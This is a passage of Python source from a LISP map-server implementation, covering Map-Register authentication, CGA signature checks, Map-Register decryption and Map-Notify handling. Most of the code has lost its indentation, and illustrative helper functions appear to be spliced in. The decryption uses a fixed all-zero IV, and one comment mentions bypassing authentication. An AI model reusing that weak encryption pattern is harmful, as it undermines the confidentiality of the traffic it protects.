map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change the Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate the message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (key in lisp_map_notify_queue):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.local_bit = True
rloc_record.probe_bit = False
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xTR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
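#
# example_select_rtr_or_xtr_rlocs
#
# Illustrative sketch only: the test "rtrs_exist ^ rloc_entry.is_rtr()" used
# above keeps exactly those RLOCs whose is_rtr() value equals the rtrs_exist
# flag. This hypothetical helper restates that selection on a plain list of
# booleans.
#
def example_select_rtr_or_xtr_rlocs(is_rtr_flags, rtrs_exist):
    return([flag for flag in is_rtr_flags if ((rtrs_exist ^ flag) == False)])
#enddef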
#
# lisp_queue_multicast_map_notify
#
# This function will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
        # The (S,G) RLOC-set could be empty when the last RLE goes away. We
        # will have to search all individual registrations looking for RTRs.
        #
        # We store them in a dictionary so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in list(sg_site_eid.individual_registrations.values()):
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = list(temp_set.values())
#endif
#
        # If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
        # to all members (all RLOCs in the sg_rloc_set).
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = []
if (len(sg_rloc_set) != 0 and sg_rloc_set[0].rle != None):
rle_nodes = sg_rloc_set[0].rle.rle_nodes
#endif
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
            # If the (S,G) has an RTR registered, then we will send a
            # Map-Notify to the RTR instead of to the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
            # No ITRs or RTRs found.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if ("signature" not in json_sig): continue
return(rloc_record)
#endfor
return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, old_div(hash_mask_len, 16)):
addr = address & 0xffff
addr = hex(addr)[2::]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2::]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
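#
# example_eid_hash_string
#
# Illustrative sketch only: for a 128-bit integer address and a hash length in
# bits, the loop in lisp_get_eid_hash() above emits 16-bit groups starting at
# the low-order end. This hypothetical helper shows the same formatting on a
# plain integer without the lisp_address wrapper.
#
def example_eid_hash_string(address, hash_mask_len):
    eid_hash = ""
    for i in range(0, hash_mask_len // 16):
        addr = hex(address & 0xffff)[2::]
        eid_hash = addr.zfill(4) + ":" + eid_hash
        address >>= 16
    #endfor
    if (hash_mask_len % 16 != 0):
        addr = hex(address & 0xff)[2::]
        eid_hash = addr.zfill(2) + ":" + eid_hash
    #endif
    return(eid_hash[0:-1])
#enddef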
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if ("public-key" not in json_pubkey): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif ("signature-eid" in sig):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
    # Lookup CGA hash in the mapping database to get the public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
    # The hashfunc must be supplied to get signature interoperability between
    # a Go signer and a Python verifier. The signature data must go through
    # a sha256 hash first. A Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data.encode(), hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
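#
# example_sign_sig_eid
#
# Illustrative sketch only: the signer-side counterpart of the verification in
# lisp_verify_cga_sig() above, using the third-party "ecdsa" package. A signer
# signs the "[<iid>]<eid>" string with a NIST256p key and sha256 so that the
# key.verify() call above succeeds. This hypothetical helper generates a
# throwaway key; a real signer would load its own.
#
def example_sign_sig_eid(sig_eid_string):
    import ecdsa, hashlib, binascii

    key = ecdsa.SigningKey.generate(curve=ecdsa.NIST256p)
    sig = key.sign(sig_eid_string.encode(), hashfunc=hashlib.sha256)
    pem = key.get_verifying_key().to_pem()
    return(pem, binascii.b2a_base64(sig))
#enddef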
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary. The key is the concatenation of the xTR address and the
# Map-Notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
    # Determine from the supplied EID-list whether any EID is in the EID-list
    # of a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
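#
# example_pop_matching_keys
#
# Illustrative sketch only: as in the function above, keys cannot safely be
# popped from a dictionary while iterating over it, so matching keys are
# collected first and removed afterwards. This helper is hypothetical and is
# not called anywhere in this file.
#
def example_pop_matching_keys(table, match):
    keys_to_remove = [key for key in table if match(key)]
    for key in keys_to_remove: table.pop(key)
    return(table)
#enddef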
#
# lisp_decrypt_map_register
#
# Check if we should just return an unencrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
    # Parse the first 4 bytes, which are not encrypted. If the packet is not
    # encrypted, return to the caller. If it is encrypted, get the 3-bit
    # key-id next to the e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
#
# Use 20 rounds so we can interoperate with ct-lisp mobile platforms.
#
plaintext = chacha.ChaCha(ekey, iv, 20).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
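#
# example_parse_map_register_header
#
# Illustrative sketch only: lisp_decrypt_map_register() above parses the first
# 4 bytes with ntohl(), taking bit 13 as the encryption bit and bits 14-16 as
# the 3-bit key-id. This hypothetical helper shows just that extraction on a
# raw packet buffer of at least 4 bytes.
#
def example_parse_map_register_header(packet):
    import socket, struct

    header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
    e_bit = (header >> 13) & 0x1
    ekey_id = (header >> 14) & 0x7
    return(e_bit, ekey_id)
#enddef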
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
    # First check if we are expecting an encrypted Map-Register. This call
    # will either return an unencrypted packet, a decrypted packet, or None
    # if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
        # Allow overlapping ams registered prefixes. Make sure we get the
        # configured parent entry and not the registered more-specific. This
        # registration could be a more-specific of the registered
        # more-specific entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (key_id in site.auth_key):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
        # If merge is being requested, get the individual site-eid. If not,
        # and what was cached had the merge bit set, set a flag to issue an
        # error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = map_register.xtr_id
if (key in site_eid.individual_registrations):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
site_eid.encrypt_json = parent.encrypt_json
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
        # If TTL is 0, unregister the entry if the source of the Map-Register
        # is in the list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None, site_eid.encrypt_json)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (addr_str not in site.allowed_rlocs):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
            # The RLOC validated. Otherwise, we would have gone on to the
            # next EID-record.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
        # Send Map-Notify if the RLOC-set changed for this site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
peid_record = copy.deepcopy(eid_record)
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, peid_record, start_rloc_records,
site_eid.eid, site)
#endfor
#
    # Send Map-Notify to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
    # The merged Map-Notify will serve as a Map-Register ack, so we don't
    # need to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_unicast_map_notify
#
# Have ITR process a Map-Notify as a result of sending a subscribe-request.
# Update map-cache entry with new RLOC-set.
#
def lisp_process_unicast_map_notify(lisp_sockets, packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# If no map-cache entry exists or does not have action LISP_SEND_
# PUBSUB_ACTION, ignore.
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.eid)
if (mc == None):
e = green(eid_str, False)
lprint("Ignoring Map-Notify EID {}, no subscribe-request entry". \
format(e))
continue
#endif
#
# Check if map-cache entry is configured subscribe-request entry.
# Otherwise, it is an entry created from the subscribe-request entry
# from a returned Map-Notify.
#
if (mc.action != LISP_SEND_PUBSUB_ACTION):
if (mc.subscribed_eid == None):
e = green(eid_str, False)
lprint("Ignoring Map-Notify for non-subscribed EID {}". \
format(e))
continue
#endif
#endif
#
        # Check if this is the map-cache entry for the EID or the SEND_PUBSUB
        # configured map-cache entry. Reuse the memory if the EID entry exists
        # and empty the RLOC-set since we will rebuild it.
#
old_rloc_set = []
if (mc.action == LISP_SEND_PUBSUB_ACTION):
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
subscribed_eid = copy.deepcopy(eid_record.eid)
subscribed_group = copy.deepcopy(eid_record.group)
else:
subscribed_eid = mc.subscribed_eid
subscribed_group = mc.subscribed_group
old_rloc_set = mc.rloc_set
mc.delete_rlocs_from_rloc_probe_list()
mc.rloc_set = []
#endif
#
# Store some data from the EID-record of the Map-Notify.
#
mc.mapping_source = None if source == "lisp-itr" else source
mc.map_cache_ttl = eid_record.store_ttl()
mc.subscribed_eid = subscribed_eid
mc.subscribed_group = subscribed_group
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(old_rloc_set) != 0 and eid_record.rloc_count == 0):
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(eid_str, False)))
continue
#endif
#
        # Now add all RLOCs to a new RLOC-set. If the RLOC existed in the old
        # set, copy the old RLOC data. We want to retain uptimes, stats, and
        # RLOC-probe data in the new entry with the same RLOC address.
#
new = replaced = 0
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
#
# See if this RLOC address is in old RLOC-set, if so, do copy.
#
found = False
for r in old_rloc_set:
if (r.rloc.is_exact_match(rloc_record.rloc)):
found = True
break
#endif
#endfor
if (found):
rloc = copy.deepcopy(r)
replaced += 1
else:
rloc = lisp_rloc()
new += 1
#endif
#
# Move data from RLOC-record of Map-Notify to RLOC entry.
#
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
mc.rloc_set.append(rloc)
#endfor
lprint("Update {} map-cache entry with {}/{} new/replaced RLOCs".\
format(green(eid_str, False), new, replaced))
#
# Build best RLOC-set and write to external data-plane, if any.
#
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
#endfor
#
# Find map-server data structure from source address of Map-Notify then
# send Map-Notify-Ack to it.
#
ms = lisp_get_map_server(source)
if (ms == None):
lprint("Cannot find Map-Server for Map-Notify source address {}".\
format(source.print_address_no_iid()))
return
#endif
